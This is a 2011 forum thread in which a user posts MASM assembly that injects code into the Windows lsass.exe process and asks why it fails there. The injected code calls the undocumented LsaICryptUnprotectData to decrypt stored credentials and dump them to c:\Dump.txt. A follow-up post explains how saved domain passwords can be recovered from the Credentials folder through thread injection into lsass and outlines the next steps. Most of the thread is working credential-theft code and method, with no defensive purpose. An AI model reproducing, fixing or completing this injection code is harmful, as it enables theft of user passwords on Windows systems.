-
May 12th, 2011, 09:04 PM
#1
Injecting Into Lsass for Cryted Data
Code:
.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\lsasrv.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\lsasrv.lib
.const
PROCESS_HANDLE equ 0
PROCESS_ID equ 1
.data
szProcess db 'lsass.exe',0
szKernel db 'KERNEL32',0
szGetProcAddress db 'GetProcAddress',0
.data?
hProcess dd ?
lpInjected dd ?
lenInjected dd ?
pInfo PROCESS_INFORMATION <>
sInfo STARTUPINFO <>
Injected PROTO:DWORD
.code
Injected PROC lpGetProcAddress:DWORD
LOCAL Stack[20h]:dword
LOCAL entropy[16]:byte
LOCAL Buffer[100h]:byte
LOCAL cbSize:dword
LOCAL BytesReturned:dword
ASSUME fs:NOTHING
push ebp
xor eax,eax
mov esi,fs:[eax+30h]
mov esi,[esi+0Ch]
mov esi,[esi+1Ch]
next_module:
mov ebp,[esi+08h]
mov edi,[esi+20h]
mov esi,[esi]
cmp [edi+12*2],al
jne next_module
cmp byte ptr[edi],6Bh
je find_kernel32_finished
cmp byte ptr[edi],4Bh
je find_kernel32_finished
jmp next_module
find_kernel32_finished:
mov ecx,ebp
pop ebp
mov eax,lpGetProcAddress
mov Stack,eax
mov Stack+4,ecx
call loc_1
_szLoadLibraryA db "LoadLibraryA",0
loc_1:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+8,eax
call loc_2
_szlsasrv db "lsasrv.dll",0
loc_2:
pop ecx
invoke (type LoadLibrary)ptr Stack+8,ecx
mov Stack+12,eax
call loc_3
_szLsaICryptUnprotectData db "LsaICryptUnprotectData",0
loc_3:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+12,ecx
mov Stack+16,eax
invoke (type LsaICryptUnprotectData)ptr Stack+16, ADDR Buffer,0FFFFh, 0, 0, 0, 0, 20000041h, 0, ADDR entropy, ADDR cbSize
call loc_4
_szCreateFileA db "CreateFileA",0
loc_4:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+20,eax
call loc_5
_szWriteFile db "WriteFile",0
loc_5:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+24,eax
call loc_6
_szExitThread db "ExitThread",0
loc_6:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+28,eax
call loc_7
FileName db "c:\Dump.txt", 0
loc_7:
pop ecx
;BreakpointHere db 0cch
invoke (type CreateFileA)ptr Stack+20, ECX, GENERIC_WRITE, 7, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0
mov ecx, eax
invoke (type WriteFile)ptr Stack+24, ECX, ADDR Buffer, 0FFFFh, ADDR BytesReturned, 0
invoke (type ExitThread)ptr Stack+28, 0
ret
Injected endp
EndInjected:
FindProcessByName proc uses ebx ecx edx esi edi _exename:dword,_returntype:dword
LOCAL Process :PROCESSENTRY32
lea esi,Process
assume esi:ptr PROCESSENTRY32
mov [esi].dwSize, sizeof PROCESSENTRY32
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
mov edi,eax
invoke Process32First,edi,esi
.while eax!=FALSE
lea eax,[esi].szExeFile
invoke lstrcmpi,eax,_exename
.if eax==0
;---found process---
mov eax,[esi].th32ProcessID
jmp @return
.endif
invoke Process32Next,edi,esi
.endw
@return:
assume esi:nothing
push eax
invoke CloseHandle,edi
pop eax
.if _returntype==PROCESS_HANDLE
invoke OpenProcess,PROCESS_ALL_ACCESS,0,eax ;return hProcess
.endif
ret
FindProcessByName endp
start:
;invoke GetModuleHandle,addr szKernel
;invoke GetProcAddress,eax,addr szGetProcAddress
;invoke Injected, EAX
;invoke ExitProcess,0
mov ebx,EndInjected
sub ebx,Injected
mov lenInjected,ebx
invoke FindProcessByName,ADDR szProcess,PROCESS_HANDLE
mov hProcess, eax
invoke VirtualAllocEx,hProcess, 0, lenInjected, MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE
mov lpInjected,eax
invoke WriteProcessMemory,hProcess,lpInjected,Injected,lenInjected,0
invoke GetModuleHandle,addr szKernel
invoke GetProcAddress,eax,addr szGetProcAddress
invoke CreateRemoteThread,hProcess,0,0,lpInjected,eax,0,0
invoke ExitProcess,0
end start
I wrote alot of this code from scrach and the rest from snibblets.
Everything here seems to work fine with calc.exe but of course it does not have access to the crypted data, but when I run it targeting Lsass.exe it dose not execute correctly. Anyone have any idea on how this is done correctly?
EDIT:
I am guessing this is the issue =(
http://mnin.blogspot.com/2007/05/inj...ged-win32.html
Last edited by AgentSmithers; May 13th, 2011 at 01:09 AM.
-
May 17th, 2011, 01:48 PM
#2
Re: Injecting Into Lsass for Cryted Data
Okay, I'm getting really warm, I guess Now I need to enum the SIDs of the users I want to extract then call the Decrypt API.
AS Quoted
I guess I aught to answer this question myself since I've now spent ages working out how to do this and I'm not sure it's widely known. CredEnumerate/CredRead will never provide password information for domain passwords no matter what process context you're in or what token you have despite what it seems to hint at on MSDN. The only way to get access to the saved credential information is to do so using the undocumented function LSAICryptUnprotectData() which is in lsasrv.dll. This can decrypt the files you find in %APPDATA%\Microsoft\Credentials and can provide an identical data structure to CredEnumerate except with the password filled in. The only catch is that this must be done in the process context of lsass.exe (The windows security subsystem), no setting of privilledges etc is enough to give a normal process the rights to do this. If you're a hacker you can do this by performing a CreateRemoteThread() to inject a thread into lsass.exe or if you're trying to do this in a legitimate way, i.e you're extending the Windows operating system in some way for a third party application, like I was, you can do this by creating a Windows authentication package which lsass will load. This AP can then use a named pipe or some such method to allow interaction with the rest of your code.
I'm getting warm, looks like my code is 1/2 dones I need to extract the SIDS then target the Encrypted file.
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
Click Here to Expand Forum to Full Width
|